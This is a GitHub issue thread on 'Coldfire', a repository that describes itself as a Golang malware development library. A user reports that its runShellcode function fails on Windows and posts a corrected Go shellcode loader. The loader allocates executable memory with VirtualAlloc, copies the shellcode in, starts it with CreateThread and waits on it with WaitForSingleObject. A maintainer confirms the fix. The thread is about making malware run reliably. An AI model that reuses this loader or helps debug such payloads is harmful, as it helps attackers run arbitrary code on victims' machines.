search

redcode-labs / Coldfire

Golang malware development library
MIT License
927 stars 142 forks source link

runShellcode broken (Windows) #38

Closed elusivethreat closed 5 months ago

elusivethreat commented 5 months ago

Tested an sRDI shellcode payload with the coldfire.runShellcode() function and it fails to execute the shellcode correctly.

Looking at the source for the function and it appears the issue lies with CreateThread without calling WaitForSingleObject afterwards. I added the WaitForSingleObject API and tested the payload and it seemed to fix the issue.

// ColdFire implementation
var bg_run uintptr = 0x00
kernel32 := syscall.MustLoadDLL("kernel32.dll")
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
procCreateThread := kernel32.MustFindProc("CreateThread")
waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
ptr := (*[990000]byte)(unsafe.Pointer(addr))
for i, value := range shellcode {
    ptr[i] = value
}
threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
waitForSingleObject.Call(threadHandle, uintptr(^uint(0)))
unrooted commented 5 months ago

seems fixed with 07d7928002d6c884610acbae393934f07027cc3c

thank you for your contrib!